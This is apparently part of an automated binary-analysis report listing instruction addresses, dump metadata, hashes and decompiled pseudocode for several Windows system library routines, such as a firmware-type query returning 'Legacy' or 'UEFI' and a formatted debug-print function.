                                                        0x0484be60
                                                        0x0484be3b
                                                        0x0484be3b
                                                        0x0484be3e
                                                        0x00000000
                                                        0x0484be40
                                                        0x0484be40
                                                        0x0484be44
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0484be44
                                                        0x0484be3e
                                                        0x0484be29
                                                        0x0484be29
                                                        0x00000000
                                                        0x0484be29
                                                        0x0484be27
                                                        0x00000000
                                                        0x0480fba7
                                                        0x0480fba7
                                                        0x0480fbab
                                                        0x0484bf02
                                                        0x0480fbb1
                                                        0x0480fbb1
                                                        0x0480fbb8
                                                        0x0480fbbd
                                                        0x0480fbbd
                                                        0x0480fbbf
                                                        0x0480fbbf
                                                        0x0480fbc5
                                                        0x0480fbcb
                                                        0x0480fbf8
                                                        0x0480fbf8
                                                        0x0480fbfa
                                                        0x00000000
                                                        0x0480fc00
                                                        0x0480fc00
                                                        0x0480fc03
                                                        0x00000000
                                                        0x0480fc09
                                                        0x0480fc09
                                                        0x0480fc0f
                                                        0x0480fc15
                                                        0x0480fc23
                                                        0x0480fc23
                                                        0x0480fc25
                                                        0x0480fc27
                                                        0x0480fc75
                                                        0x0480fc7c
                                                        0x0480fc84
                                                        0x00000000
                                                        0x0480fc29
                                                        0x0480fc29
                                                        0x0480fc2d
                                                        0x0480fc30
                                                        0x0484bf0f
                                                        0x00000000
                                                        0x0480fc36
                                                        0x0480fc38
                                                        0x0480fc3b
                                                        0x0480fc41
                                                        0x0484bf17
                                                        0x0484bf19
                                                        0x0484bf48
                                                        0x0484bf4b
                                                        0x00000000
                                                        0x0484bf1b
                                                        0x0484bf22
                                                        0x0484bf24
                                                        0x0484bf26
                                                        0x00000000
                                                        0x0484bf2c
                                                        0x0484bf37
                                                        0x0484bf39
                                                        0x0484bf3b
                                                        0x00000000
                                                        0x0484bf41
                                                        0x0484bf41
                                                        0x0484bf41
                                                        0x0484bf41
                                                        0x0484bf45
                                                        0x00000000
                                                        0x0484bf45
                                                        0x0484bf3b
                                                        0x0484bf26
                                                        0x00000000
                                                        0x0480fc47
                                                        0x0480fc47
                                                        0x0480fc49
                                                        0x0480fcb2
                                                        0x0480fcb4
                                                        0x0480fcb6
                                                        0x0480fcdc
                                                        0x0480fcdc
                                                        0x00000000
                                                        0x0480fcb8
                                                        0x0480fcc3
                                                        0x0480fcc5
                                                        0x0480fcc7
                                                        0x00000000
                                                        0x0480fcc9
                                                        0x0480fcc9
                                                        0x0480fccd
                                                        0x00000000
                                                        0x0480fccd
                                                        0x0480fcc7
                                                        0x00000000
                                                        0x0480fc4b
                                                        0x0480fc4b
                                                        0x0480fc4e
                                                        0x0480fc4e
                                                        0x0480fc51
                                                        0x0480fc51
                                                        0x0480fc54
                                                        0x0480fc5a
                                                        0x0480fc5c
                                                        0x0480fc5f
                                                        0x0480fc61
                                                        0x0480fc63
                                                        0x0480fc65
                                                        0x0480fc67
                                                        0x0480fc6e
                                                        0x0480fc72
                                                        0x0480fc72
                                                        0x0480fc72
                                                        0x0480fc72
                                                        0x0480fc67
                                                        0x0480fc61
                                                        0x00000000
                                                        0x0480fc5a
                                                        0x0480fc49
                                                        0x0480fc41
                                                        0x0480fc30
                                                        0x0480fc27
                                                        0x0480fc03
                                                        0x0480fbcd
                                                        0x0480fbd3
                                                        0x0480fbd9
                                                        0x0480fbdc
                                                        0x0480fbde
                                                        0x0480fc99
                                                        0x0480fc9b
                                                        0x0480fc9d
                                                        0x0480fcd5
                                                        0x0480fcd5
                                                        0x0480fc89
                                                        0x0480fc89
                                                        0x00000000
                                                        0x0480fc9f
                                                        0x0480fc9f
                                                        0x0480fca3
                                                        0x00000000
                                                        0x0480fca3
                                                        0x00000000
                                                        0x0480fbe4
                                                        0x0480fbe4
                                                        0x0480fbe4
                                                        0x0480fbe4
                                                        0x0480fbe9
                                                        0x0480fbf2
                                                        0x00000000
                                                        0x0480fbf2
                                                        0x0480fbde
                                                        0x0480fbcb
                                                        0x0480fbab
                                                        0x0480fc8b
                                                        0x0480fc8b
                                                        0x0480fc8c
                                                        0x0480fb80
                                                        0x0480fb72
                                                        0x0480fb5e
                                                        0x0480fc8d
                                                        0x0480fc91
                                                        0x0480fadf
                                                        0x0480fadf
                                                        0x0480fae1
                                                        0x0480fae4
                                                        0x0480fae7
                                                        0x0480faec
                                                        0x0480faf8
                                                        0x0480fb00
                                                        0x0480fb07
                                                        0x0480fb0f
                                                        0x0480fb0f
                                                        0x0480fb07
                                                        0x00000000
                                                        0x0480faf8
                                                        0x0480fadd

                                                        Strings
                                                        • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0484BE0F
                                                        • pf, xrefs: 0484BE66
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!$pf
                                                        • API String ID: 0-2162631654
                                                        • Opcode ID: 86bcab6208f678a1752ed4798bbab961d47019c9f2c47a7ed2f723dfa35ee9ff
                                                        • Instruction ID: e7574d8283914da3b0cd997750e49b706b7013aed5b0340afa3ba4fc7ce73d1b
                                                        • Opcode Fuzzy Hash: 86bcab6208f678a1752ed4798bbab961d47019c9f2c47a7ed2f723dfa35ee9ff
                                                        • Instruction Fuzzy Hash: 5DA1E431B1061A8BE775DF68C85477AB3A4AF88714F04CF69DA06DB680EBB4F901CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048551BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 77%
                                                        			E048551BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x48b05f0);
				E0482D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E047EEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E048553CA(0);
						return E0482D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0481F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E047F3690(1, _t117, 0x47b1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0481AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L047F4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0481AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0485500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E04819860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                                        0x048551be
                                                        0x048551c3
                                                        0x048551c8
                                                        0x048551cd
                                                        0x048551d0
                                                        0x048551d3
                                                        0x048551d8
                                                        0x048551db
                                                        0x048551de
                                                        0x048551e0
                                                        0x048551e3
                                                        0x048551e6
                                                        0x048551e8
                                                        0x04855342
                                                        0x04855351
                                                        0x04855356
                                                        0x0485535a
                                                        0x04855360
                                                        0x04855363
                                                        0x04855366
                                                        0x04855369
                                                        0x04855369
                                                        0x0485536b
                                                        0x0485536b
                                                        0x04855370
                                                        0x048553a3
                                                        0x048553a4
                                                        0x048553a6
                                                        0x048553ab
                                                        0x048553ab
                                                        0x048553ae
                                                        0x048553ae
                                                        0x048553b5
                                                        0x048553bf
                                                        0x048553bf
                                                        0x04855375
                                                        0x04855396
                                                        0x048553a0
                                                        0x048553a0
                                                        0x00000000
                                                        0x04855396
                                                        0x04855377
                                                        0x04855379
                                                        0x0485537f
                                                        0x0485538c
                                                        0x04855390
                                                        0x00000000
                                                        0x04855390
                                                        0x048551ee
                                                        0x048551f1
                                                        0x04855301
                                                        0x04855310
                                                        0x04855315
                                                        0x04855318
                                                        0x0485531b
                                                        0x04855320
                                                        0x0485532e
                                                        0x04855331
                                                        0x00000000
                                                        0x04855331
                                                        0x04855328
                                                        0x04855329
                                                        0x00000000
                                                        0x04855329
                                                        0x048551fa
                                                        0x04855235
                                                        0x04855236
                                                        0x04855239
                                                        0x0485523f
                                                        0x04855240
                                                        0x04855241
                                                        0x04855242
                                                        0x04855246
                                                        0x04855247
                                                        0x0485524e
                                                        0x04855251
                                                        0x04855267
                                                        0x04855269
                                                        0x0485526e
                                                        0x0485527d
                                                        0x0485527e
                                                        0x04855281
                                                        0x04855282
                                                        0x04855287
                                                        0x04855288
                                                        0x0485528a
                                                        0x0485528f
                                                        0x04855294
                                                        0x00000000
                                                        0x00000000
                                                        0x0485529a
                                                        0x0485529c
                                                        0x0485529e
                                                        0x0485529e
                                                        0x048552a4
                                                        0x048552b0
                                                        0x00000000
                                                        0x00000000
                                                        0x048552ba
                                                        0x048552bc
                                                        0x048552bc
                                                        0x048552d4
                                                        0x048552d9
                                                        0x048552dc
                                                        0x048552e1
                                                        0x00000000
                                                        0x00000000
                                                        0x048552e7
                                                        0x048552f4
                                                        0x00000000
                                                        0x048552f4
                                                        0x04855270
                                                        0x00000000
                                                        0x04855270
                                                        0x048551fc
                                                        0x048551fd
                                                        0x04855202
                                                        0x04855203
                                                        0x04855205
                                                        0x0485520a
                                                        0x0485520f
                                                        0x00000000
                                                        0x00000000
                                                        0x0485521b
                                                        0x04855226
                                                        0x0485522b
                                                        0x0485521d
                                                        0x0485521d
                                                        0x04855222
                                                        0x04855222
                                                        0x0485522d
                                                        0x00000000

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID: Legacy$UEFI
                                                        • API String ID: 2994545307-634100481
                                                        • Opcode ID: a3fbe384c8bffca02bbea410ab05e6186d1737517171a22a72845260a5601d70
                                                        • Instruction ID: 2c796b91fe8f0d359ec36c3948ac95adfe63f052efd05b3027bae8bf6c0955c4
                                                        • Opcode Fuzzy Hash: a3fbe384c8bffca02bbea410ab05e6186d1737517171a22a72845260a5601d70
                                                        • Instruction Fuzzy Hash: AF5181B1E00608AFDB24DFA8C840BADBBF8FF49704F54492DE949EB265D670E940CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 047DB171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 78%
                                                        			E047DB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x48af7a8);
				E0482D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0482D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0481D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0481F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0482DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0481B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0481B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0481E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0481A890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                                        0x047db171
                                                        0x047db171
                                                        0x047db171
                                                        0x047db171
                                                        0x047db171
                                                        0x047db176
                                                        0x047db17b
                                                        0x047db180
                                                        0x047db186
                                                        0x047db18f
                                                        0x047db198
                                                        0x047db1a4
                                                        0x047db1aa
                                                        0x04834802
                                                        0x04834802
                                                        0x04834805
                                                        0x0483480c
                                                        0x0483480e
                                                        0x047db1d1
                                                        0x047db1d3
                                                        0x047db1de
                                                        0x047db1de
                                                        0x04834817
                                                        0x0483481e
                                                        0x04834820
                                                        0x04834822
                                                        0x04834822
                                                        0x04834824
                                                        0x04834824
                                                        0x0483482a
                                                        0x00000000
                                                        0x00000000
                                                        0x04834835
                                                        0x0483483a
                                                        0x0483483d
                                                        0x0483483f
                                                        0x04834842
                                                        0x04834842
                                                        0x04834842
                                                        0x04834846
                                                        0x0483484c
                                                        0x0483484e
                                                        0x04834851
                                                        0x04834851
                                                        0x04834853
                                                        0x04834854
                                                        0x04834854
                                                        0x04834858
                                                        0x0483485a
                                                        0x0483485a
                                                        0x0483485d
                                                        0x0483485f
                                                        0x04834861
                                                        0x04834861
                                                        0x04834866
                                                        0x0483486b
                                                        0x0483486e
                                                        0x04834871
                                                        0x04834876
                                                        0x04834876
                                                        0x04834878
                                                        0x0483487b
                                                        0x04834884
                                                        0x04834884
                                                        0x00000000
                                                        0x0483487d
                                                        0x0483487d
                                                        0x04834882
                                                        0x04834889
                                                        0x04834889
                                                        0x0483488f
                                                        0x04834891
                                                        0x048348e0
                                                        0x048348e2
                                                        0x048348e4
                                                        0x048348e4
                                                        0x048348e7
                                                        0x048348e7
                                                        0x048348ed
                                                        0x048348f4
                                                        0x048348f6
                                                        0x04834951
                                                        0x04834951
                                                        0x04834953
                                                        0x04834953
                                                        0x04834956
                                                        0x04834956
                                                        0x04834958
                                                        0x04834959
                                                        0x04834959
                                                        0x0483495d
                                                        0x0483495d
                                                        0x0483495f
                                                        0x0483495f
                                                        0x04834965
                                                        0x04834969
                                                        0x048349ba
                                                        0x048349ba
                                                        0x048349c1
                                                        0x048349c5
                                                        0x048349cc
                                                        0x048349d4
                                                        0x048349d7
                                                        0x048349da
                                                        0x048349e4
                                                        0x048349e5
                                                        0x048349f3
                                                        0x04834a02
                                                        0x00000000
                                                        0x04834a02
                                                        0x04834972
                                                        0x04834974
                                                        0x00000000
                                                        0x00000000
                                                        0x04834976
                                                        0x04834979
                                                        0x04834982
                                                        0x04834983
                                                        0x04834984
                                                        0x0483498b
                                                        0x0483498d
                                                        0x04834991
                                                        0x04834993
                                                        0x04834999
                                                        0x0483499d
                                                        0x048349a2
                                                        0x048349a2
                                                        0x048349a2
                                                        0x04834999
                                                        0x048349ac
                                                        0x00000000
                                                        0x048349b3
                                                        0x048348f8
                                                        0x048348fe
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x048348fe
                                                        0x04834895
                                                        0x0483489c
                                                        0x048348ad
                                                        0x048348b2
                                                        0x048348b5
                                                        0x048348b7
                                                        0x048348ba
                                                        0x048348bc
                                                        0x048348c6
                                                        0x048348c6
                                                        0x048348cb
                                                        0x048348d1
                                                        0x048348d4
                                                        0x048348d8
                                                        0x048348d8
                                                        0x00000000
                                                        0x048348d8
                                                        0x048348be
                                                        0x048348c0
                                                        0x00000000
                                                        0x00000000
                                                        0x048348c2
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x048348c4
                                                        0x00000000
                                                        0x04834882
                                                        0x0483487b
                                                        0x04834904
                                                        0x04834906
                                                        0x00000000
                                                        0x00000000
                                                        0x04834908
                                                        0x0483490e
                                                        0x00000000
                                                        0x00000000
                                                        0x04834910
                                                        0x04834917
                                                        0x04834917
                                                        0x00000000
                                                        0x04834917
                                                        0x047db1ba
                                                        0x048347f9
                                                        0x048347fc
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x048347fc
                                                        0x047db1c0
                                                        0x047db1c0
                                                        0x047db1c3
                                                        0x047db1cb
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: _vswprintf_s
                                                        • String ID:
                                                        • API String ID: 677850445-0
                                                        • Opcode ID: 6779b0f8476f59d0c1e0610da0e51d41bd6a4d50bc840881a679318b8068c400
                                                        • Instruction ID: c1e635bd42d359c37f9bde41f2b614d6508c91c8dfc8a40702c7f24c536fbd58
                                                        • Opcode Fuzzy Hash: 6779b0f8476f59d0c1e0610da0e51d41bd6a4d50bc840881a679318b8068c400
                                                        • Instruction Fuzzy Hash: ED51F071D002598EEB31CF68C840BAEBBB0BF04B19F104BA9D859EB291D77569819BD1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 047FB944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 76%
                                                        			E047FB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x48cd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E047F7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E048A8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E04819E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0481B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0481CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E047F7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E048A8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
